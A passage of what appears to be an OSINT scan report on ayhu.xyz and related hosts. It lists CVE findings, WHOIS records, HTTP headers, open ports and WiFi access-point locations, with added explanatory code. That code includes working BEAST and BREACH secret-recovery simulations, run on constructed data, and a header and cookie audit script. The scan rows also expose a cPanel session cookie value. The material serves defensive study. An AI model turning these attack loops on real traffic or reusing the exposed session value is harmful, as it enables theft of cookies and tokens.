0 110-4.125 2.063 2.063 0 010 4.125zm15.112 13.018h-3.558v-5.57c0-1.326-.024-3.037-1.852-3.037-1.851 0-2.133 1.449-2.133 2.944v5.663H9.356V8.995h3.413v1.566h.047c.473-.9 1.636-1.852 3.365-1.852 3.605 0 4.27 2.372 4.27 5.457v6.286z"></path></svg></a></div></ul></li></ul></nav><div class="flex text-xs md:text-sm justify-between flex-col md:flex-row pt-6 md:mt-12 pb-12 border-neutral-800 border-t"><span class="text-neutr" (Indicator: "linkedin.com")\n 
""nonGoogleScripts":["__bzi","__twitter_website_tag"]}" (Indicator: "twitter")\n "{state:0,transportUrl:b,context:c,parent:Kl()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ia+"&cx=c";ns()&&(f+="&sign="+Jh.We);var g=Sh||Uh?ms(b,f):void 0;g||(g=Yo("https://","http://",Jh.ve+f));El().destination[a]={state:1,context:c,parent:Kl()};mc(g)}};function os(){if(Cl()){return!0}return!1};var rs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ss={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ts={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "function Sy(a,b){var c=this;return b}Sy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ty=["www.youtube.com","www.youtube-nocookie.com"],Uy,Vy=!1;" (Indicator: "youtube")\n "g})};return{store:function(g,h){var m=f(g);m?m.button=h:e.push({form:g,button:h})},get:function(g){var h=f(g);return h?h.button:null}}}function d(e,f,g,h,m){var n=Kv("fsl",g?"nv.mwt":"mwt",0),p;p=g?Kv("fsl","nv.ids",[]):Kv("fsl","ids",[]);if(!p.length)return!0;var q=Gv(e,"gtm.formSubmit",p),r=e.action;r&&r.tagName&&(r=e.cloneNode(!1).action);q["gtm.elementUrl"]=r;P(121);"https://www.facebook.com/tr/"===r&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===r)return!0;m&&(q["gtm.formSubmitElement"]=" (Indicator: "facebook.com")\n "var dw=function(a,b,c){function d(){var g=a();f+=e?(Va()-e)*g.playbackRate/1E3:0;e=Va()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Kg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Kg*h):Math.round(n.Hi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Mk(c);d();var 
u=void 0;void 0!==b&&(u=[b]);var v=Gv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":Ly(d.verticalThresholds,b,"vert.pct")}Kv("sdl","init",!1)?Kv("sdl","pending",!1)||J(function(){return My()}):(Iv("sd | 185.199.110.153 |
| 2023-05-12 02:58:47 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | ayhu.xyz |
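The CVE text above describes BEAST in terms of its preconditions: CBC mode where each TLS 1.0 (or SSL 3.0) record takes its IV from the last ciphertext block of the previous record, so the attacker knows the IV before the next plaintext is chosen, plus a way to inject chosen plaintext in front of the secret (the JavaScript/WebSocket part). testssl.sh raises the finding for ayhu.xyz because the server still negotiates CBC cipher suites under TLS 1.0; that is a configuration observation, not proof of exploitability, since current browsers split records (1/n-1) so the attacker never controls a whole block. The simulation below is added here and is not from the page or from testssl.sh. A keyed SHA-256 PRF stands in for the AES block cipher because the attack only compares ciphertext blocks and never decrypts; everything else (CBC chaining, predictable IV, chosen boundary, 256 guesses per byte) is the real mechanism. Key, secret and IV are constructed values.

```python
import hashlib

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    # Stand-in for the AES block cipher inside AES-CBC: a keyed SHA-256 PRF truncated to one
    # block. The attack only ever compares ciphertext blocks, so decryption is not needed.
    return hashlib.sha256(key + block).digest()[:BLOCK]


class Tls10CbcSender:
    """Victim's record layer. Each record is attacker_controlled + SECRET (an attacker-chosen
    URL path followed by the session cookie, as in the JavaScript/WebSocket setting of the
    CVE text), CBC-encrypted with the TLS 1.0 rule that a record's IV is the last
    ciphertext block of the previous record. Everything returned is visible on the wire."""

    def __init__(self, key, secret, first_iv):
        self.key, self.secret, self.chain = key, secret, first_iv
        self.records_sent = 0

    def send(self, controlled):
        pt = controlled + self.secret
        padlen = BLOCK - len(pt) % BLOCK
        pt += bytes([padlen]) * padlen            # pad to a block multiple; layout is irrelevant here
        blocks, prev = [], self.chain
        for i in range(0, len(pt), BLOCK):
            prev = block_encrypt(self.key, xor(pt[i:i + BLOCK], prev))
            blocks.append(prev)
        self.chain = prev                          # the flaw: the next IV is already public
        self.records_sent += 1
        return blocks


def beast_recover(sender, secret_len):
    """Attacker side: sees every ciphertext block and chooses the bytes that precede the
    secret in each record (the chosen boundary), but never sees any plaintext."""
    recovered = b""
    wire_last = sender.send(b"")[-1]              # any earlier record; its last block is the next IV
    for i in range(secret_len):
        # Pick a prefix length so secret byte i is the last byte of a block whose other
        # 15 bytes are known (prefix bytes and/or already recovered secret bytes).
        prefix = b"A" * ((BLOCK - 1 - i) % BLOCK)
        t = (len(prefix) + i) // BLOCK
        rec = sender.send(prefix)
        c_prev = rec[t - 1] if t else wire_last   # target block was E(P_t XOR c_prev)
        c_target = rec[t]
        known = (prefix + recovered)[t * BLOCK:t * BLOCK + BLOCK - 1]
        wire_last = rec[-1]
        for g in range(256):
            guess = known + bytes([g])
            # After XOR with the predictable IV the cipher input becomes guess XOR c_prev,
            # so the first ciphertext block equals c_target exactly when guess == P_t.
            probe = xor(xor(guess, c_prev), wire_last)
            rec = sender.send(probe)
            wire_last = rec[-1]
            if rec[0] == c_target:
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched: chaining assumption violated")
    return recovered


def demo():
    # Constructed key, secret and first IV so the run is reproducible; any values work.
    key = b"\x13" * BLOCK
    secret = b"session=7f3a9c1e0b"
    victim = Tls10CbcSender(key, secret, first_iv=b"\x00" * BLOCK)
    return beast_recover(victim, len(secret)), secret, victim.records_sent


if __name__ == "__main__":
    got, want, sent = demo()
    print(got, got == want, sent)
```

The loop needs at most 256 probe records per secret byte and no plaintext from the victim. It works only because the IV of each record is the last ciphertext block of the one before; TLS 1.1 and later carry an explicit per-record IV, and 1/n-1 record splitting in clients removes the attacker's control of a full block. The remediation for this finding is to stop offering TLS 1.0 and 1.1 rather than to reshuffle CBC cipher suites.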
| 2023-05-12 02:50:34 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.109.153]
https://www.virustotal.com/en/ip-address/185.199.109.153/information/ | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom (Net ID: 00:01:38:A4:44:3A) | 37.780462,-122.390564 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:0B:41) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:59:52 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | nwapi2.battleb0t.xyz |
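testssl.sh reports BREACH for nwapi2.battleb0t.xyz when the server answers the probed path with HTTP compression (Content-Encoding gzip, deflate or br). That is one precondition; the attack also needs a response that both reflects attacker-controlled input and contains a secret, because DEFLATE's LZ77 stage encodes a repeated string as a short back-reference, so a reflected guess that matches the secret shrinks the compressed body, and TLS hides bytes but not byte counts. The example below is added here and is not from the page or from testssl.sh. It builds a constructed page with a reflected search term and a CSRF token, uses zlib as the compression stage, and shows the length oracle: a correct guess produces a measurably shorter response, and the greedy character-at-a-time loop recovers the token from that signal alone. Secret, alphabet and page layout are constructed.

```python
import zlib

# Constructed page: a search term is reflected into the HTML and the same response carries
# a per-session CSRF token. Reflection + secret + compression are the BREACH preconditions.
SECRET = "a7f3e9c1b2d4f60e9c1a3b5d7f2e4c6a"
ALPHABET = "0123456789abcdef"
KNOWN_CONTEXT = 'name="csrf_token" value="'       # bytes that precede the secret in the page


def render_page(reflected):
    return (
        '<html><body><a href="/search?q=' + reflected + '">search again</a>'
        + '<form method="post"><input type="hidden" ' + KNOWN_CONTEXT + SECRET + '">'
        + '</form></body></html>'
    ).encode()


def observed_length(reflected):
    """What a network attacker sees: the size of the compressed body. TLS hides the bytes,
    not their count, and HTTP compression runs before encryption."""
    return len(zlib.compress(render_page(reflected), 9))


def rank_next_char(known, alphabet=ALPHABET):
    """Candidates for the next secret character that produce the smallest response.
    The right character extends the LZ77 back-reference by one byte; a wrong one forces
    an extra literal, so the right one is never larger in bits."""
    sizes = {ch: observed_length(known + ch) for ch in alphabet}
    best = min(sizes.values())
    return [ch for ch in alphabet if sizes[ch] == best]


def recover(known, want_len, alphabet=ALPHABET):
    """Greedy character-at-a-time recovery. Sizes are whole bytes, so a one-byte Huffman
    saving can round away and several candidates tie; the real attack breaks ties with a
    second query pair. This version stops at the first ambiguity rather than guessing."""
    got = known
    while len(got) < len(known) + want_len:
        cands = rank_next_char(got, alphabet)
        if len(cands) != 1:
            break
        got += cands[0]
    return got[len(known):]


if __name__ == "__main__":
    wrong = "Z" * 0 + "QKMWPRVNJHGSDTYUIOLBXCVFEAPOIUYZ"   # constructed, same length, no match
    print(observed_length(KNOWN_CONTEXT + SECRET), observed_length(KNOWN_CONTEXT + wrong))
    print(recover(KNOWN_CONTEXT, len(SECRET)))
```

The recovered prefix comes from response sizes only, never from the response bytes, which is why TLS does not help. Mitigations in order of reliability: do not compress responses that carry secrets, keep secrets out of responses that reflect user input, mask tokens per request so the secret bytes never repeat across responses, and, as a weaker measure, add random padding and rate limiting so the oracle becomes noisy and expensive.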
| 2023-05-12 02:55:01 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 188.114.96.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jones (Net ID: 00:04:5A:2E:16:19) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-oo2.github.io]
https://www.openphish.com/feed.txt | 0-oo2.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0080004.github.io | 185.199.111.153 |
| 2023-05-12 02:53:49 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8000::153:80 | 2606:50c0:8000::153 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.168.252 |
| 2023-05-12 02:45:12 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3031::ac43:8709', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2095 | 104.21.71.14 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:35 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | leanna.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 03:17:36 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: aahu.xyz
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2023-04-10T07:00:00Z
Creation Date: 2022-04-10T07:00:00Z
Registrar Registration Expiration Date: 2023-04-10T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Name Server: hugh.ns.cloudflare.com
Name Server: ryleigh.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:00:00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in our WHOIS database is provided for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. We do not guarantee its accuracy. By submitting a WHOIS
query, you agree to abide by the following terms of use: You agree that you may
use this Data only for lawful purposes and that under no circumstances will you
use this Data to: (1) allow, enable, or otherwise support the transmission of
mass unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes that
apply to us (or our computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without our
prior written consent. We reserve the right to terminate your access to the
WHOIS database at our sole discretion, including without limitation, for
excessive querying of the WHOIS database or for failure to otherwise abide by
this policy. We reserve the right to modify these terms at any time.
Domains - cheap, easy, and secure at NameSilo.com
https://www.namesilo.com
Register your domain now at www.NameSilo.com - Domains. Cheap, Fast and Secure
| aahu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Klovenier (Net ID: 00:01:36:06:40:52) | 52.3759, 4.8975 |
| 2023-05-12 02:46:01 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:00'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.196.30.220', u'continent': u'North America', u'region_iso_code': u'SC'} | 104.196.30.220 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5a3c76a8562af2-ORD"]} | 188.114.97.1 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "cpsession=%3aQkwdhfWxmK8h0n7J%2c873f8738210af1095901a669c6d9b2d7; HttpOnly; path=/; port=2083; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2083; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
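Two header captures on this page deserve a closer read than the "Non-Standard HTTP Header" and "HTTP Headers" labels suggest. The Cloudflare response earlier (cf-ray 7c5f6036feab195d-EWR) carries cf-mitigated: challenge, which Cloudflare sets on its own challenge page; the COOP/COEP/CORP and Permissions-Policy headers in that capture therefore describe the edge interstitial, not the origin application, and any software fingerprint taken from it is Cloudflare's. The cPanel capture on 87.248.157.102 directly above is an origin response on port 2083 and its twelve Set-Cookie values are the interesting part: every cookie is HttpOnly, none sets SameSite, the two final Horde cookies lack Secure, and all carry the legacy port= attribute. The example below is added here and is not SpiderFoot's code. It normalises both spellings SpiderFoot emits (Censys-style "Set_Cookie" and raw "set-cookie"), skips the _encoding metadata key, detects the Cloudflare challenge case, lists missing defensive headers, and audits each Set-Cookie. The header sets are re-typed from the two rows with headers not needed for the checks trimmed.

```python
# Constructed from the two rows discussed above. The Censys module reports names like
# "Set_Cookie"; the Strange Header Identifier keeps raw lower-case names. Headers not
# needed for the checks are trimmed; '_encoding' is SpiderFoot metadata, not a header.
CPANEL_2083 = {
    "_encoding": {"Set_Cookie": "DISPLAY_UTF8"},
    "Set_Cookie": [
        "cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "cpsession=%3aQkwdhfWxmK8h0n7J%2c873f8738210af1095901a669c6d9b2d7; HttpOnly; path=/; port=2083; secure",
        "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2083; secure",
        "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure",
        "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083",
        "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083",
    ],
    "X_Content_Type_Options": ["nosniff"],
    "X_Frame_Options": ["SAMEORIGIN"],
    "Cache_Control": ["no-cache, no-store, must-revalidate, private"],
}

CLOUDFLARE_CHALLENGE = {
    "cf-mitigated": "challenge",
    "server": "cloudflare",
    "referrer-policy": "same-origin",
    "x-frame-options": "SAMEORIGIN",
    "cross-origin-opener-policy": "same-origin",
    "cross-origin-embedder-policy": "require-corp",
    "cross-origin-resource-policy": "same-origin",
    "content-type": "text/html; charset=UTF-8",
}

# Response headers a practitioner expects on an authenticated HTTPS application.
EXPECTED = ["strict-transport-security", "content-security-policy",
            "x-content-type-options", "x-frame-options", "referrer-policy"]


def normalize(headers):
    """Lower-case hyphenated names with list values, whichever spelling the module used."""
    out = {}
    for key, value in headers.items():
        if key == "_encoding":
            continue
        name = key.lower().replace("_", "-")
        out.setdefault(name, []).extend(value if isinstance(value, list) else [value])
    return out


def is_edge_challenge(headers):
    """Cloudflare sets cf-mitigated: challenge on its own challenge page. Headers and
    fingerprints from such a response describe the edge, not the origin application."""
    return "challenge" in normalize(headers).get("cf-mitigated", [])


def missing_headers(headers):
    present = normalize(headers)
    return [name for name in EXPECTED if name not in present]


def parse_set_cookie(value):
    """Cookie name plus a lower-cased attribute dict; flag attributes map to ''."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def cookie_findings(headers):
    """Per Set-Cookie: which of Secure/HttpOnly/SameSite are absent, and any legacy
    attributes (port= comes from RFC 2965 Set-Cookie2 and is ignored by current browsers)."""
    findings = []
    for raw in normalize(headers).get("set-cookie", []):
        name, attrs = parse_set_cookie(raw)
        findings.append({
            "name": name,
            "missing": [a for a in ("secure", "httponly", "samesite") if a not in attrs],
            "legacy": [a for a in attrs if a in ("port", "version", "discard")],
        })
    return findings


if __name__ == "__main__":
    for label, hdrs in (("cloudflare", CLOUDFLARE_CHALLENGE), ("cpanel", CPANEL_2083)):
        print(label, "edge challenge:", is_edge_challenge(hdrs), "missing:", missing_headers(hdrs))
    for f in cookie_findings(CPANEL_2083):
        print(f)
```

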